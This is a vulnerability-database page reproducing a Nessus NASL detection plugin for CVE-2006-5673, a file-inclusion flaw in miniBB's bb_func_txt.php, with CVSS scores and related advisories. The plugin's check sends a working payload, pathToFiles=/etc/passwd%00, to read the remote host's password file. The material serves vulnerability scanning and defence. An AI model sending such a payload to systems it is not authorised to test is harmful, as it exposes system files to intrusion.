Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2006-2022 Justin SeitzMINIBB_RFI.NASL
HistoryOct 30, 2006 - 12:00 a.m.

miniBB bb_func_txt.php pathToFiles Parameter Remote File Inclusion

2006-10-3000:00:00
This script is Copyright (C) 2006-2022 Justin Seitz
www.tenable.com
30

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

EPSS

0.168

Percentile

96.1%

JSON

The remote web server is running MiniBB, an open source forum software.

The version of MiniBB installed on the remote host fails to sanitize input to the ‘pathToFiles’ parameter before using it in the ‘bb_func_txt.php’ script.

Provided PHP’s ‘register_globals’ setting is enabled, an unauthenticated attacker can exploit this issue to view arbitrary files and execute arbitrary code, possibly taken from third-party hosts, on the remote host.

#%NASL_MIN_LEVEL 70300
#
#       This script was written by Justin Seitz <[email protected]>
#	Per Justin : GPLv2
#

# Changes by Tenable:
# - Revised plugin title (3/15/10)

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(22926);
  script_version("1.25");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2006-5673");
  script_bugtraq_id(20757);
  script_xref(name:"EDB-ID", value:"2655");

  script_name(english:"miniBB bb_func_txt.php pathToFiles Parameter Remote File Inclusion");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that is affected by a
remote file include issue.");
  script_set_attribute(attribute:"description", value:
"The remote web server is running MiniBB, an open source forum
software. 

The version of MiniBB installed on the remote host fails to sanitize
input to the 'pathToFiles' parameter before using it in the
'bb_func_txt.php' script. 

Provided PHP's 'register_globals' setting is enabled, an
unauthenticated attacker can exploit this issue to view arbitrary
files and execute arbitrary code, possibly taken from third-party
hosts, on the remote host.");
  script_set_attribute(attribute:"solution", value:
"Update to version 2.0.2a or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:W/RC:ND");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2006/10/26");
  script_set_attribute(attribute:"plugin_publication_date", value:"2006/10/30");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2006-2022 Justin Seitz");

  script_dependencies("http_version.nasl");
  script_require_keys("www/PHP");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("misc_func.inc");
include("data_protection.inc");

port = get_http_port(default:80, embedded:TRUE);

#
# verify we can talk to the web server, if not exit
#

if (get_kb_item("Services/www/"+port+"/embedded")) exit(0);
if(!can_host_php(port:port)) exit(0);

#
# create list of directories to scan
#


# Loop through directories.
if (thorough_tests) dirs = list_uniq(make_list("/minibb","/mini","/blog","/forum", cgi_dirs()));
else dirs = make_list(cgi_dirs());

#
# Iterate through the list
#

file = "/etc/passwd";

foreach dir (dirs) {

#
#
#       Attack: Attempt a remote file include of /etc/passwd
#
#
  attackreq = http_get(item:string(dir, "/bb_func_txt.php?pathToFiles=", file, "%00"),port:port);
  attackres = http_keepalive_send_recv(port:port, data:attackreq, bodyonly:TRUE);

  if (attackres == NULL) exit(0);

  if (dir == "") dir = "/";

  if (egrep(pattern:"root:.*:0:[01]:", string:attackres) ||
    string("main(", file, "\\0bb_codes.php): failed to open stream") >< attackres ||
    string("main(", file, "): failed to open stream: No such file") >< attackres ||
    "open_basedir restriction in effect. File(" >< attackres)   {

    passwd = "";
    if (egrep(pattern:"root:.*:0:[01]:", string:attackres))     {
      passwd = attackres;
      if ("<br" >< passwd) passwd = passwd - strstr(passwd, "<br");
    }

    if (passwd) {
      passwd = data_protection::redact_etc_passwd(output:passwd);
      report = string("\n", "The version of MiniBB installed in directory '", dir, "'\n",
        "is vulnerable to this issue. Here is the contents of /etc/passwd\n",
        "from the remote host :\n\n", passwd);
      security_warning(port:port, extra:report);
    }
    exit(0);
  }
}

Related

openvas 2
nvd 1
cvelist 1
exploitdb 1
cve 1
openvas
openvas
MiniBB PathToFiles Parameter Remote File Include Vulnerability
2008-10-24 00:00:00
MiniBB PathToFiles Parameter Remote File Include Vulnerability
2008-10-24 00:00:00
nvd
nvd
CVE-2006-5673
2006-11-03 01:07:00
cvelist
cvelist
CVE-2006-5673
2006-11-03 01:00:00
exploitdb
exploitdb
MiniBB 2.0.2 - &#039;bb_func_txt.php&#039; Remote File Inclusion
2006-10-26 00:00:00
cve
cve
CVE-2006-5673
2006-11-03 01:07:00

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

EPSS

0.168

Percentile

96.1%

JSON
Related for MINIBB_RFI.NASL
openvas2nvd1cvelist1exploitdb1cve1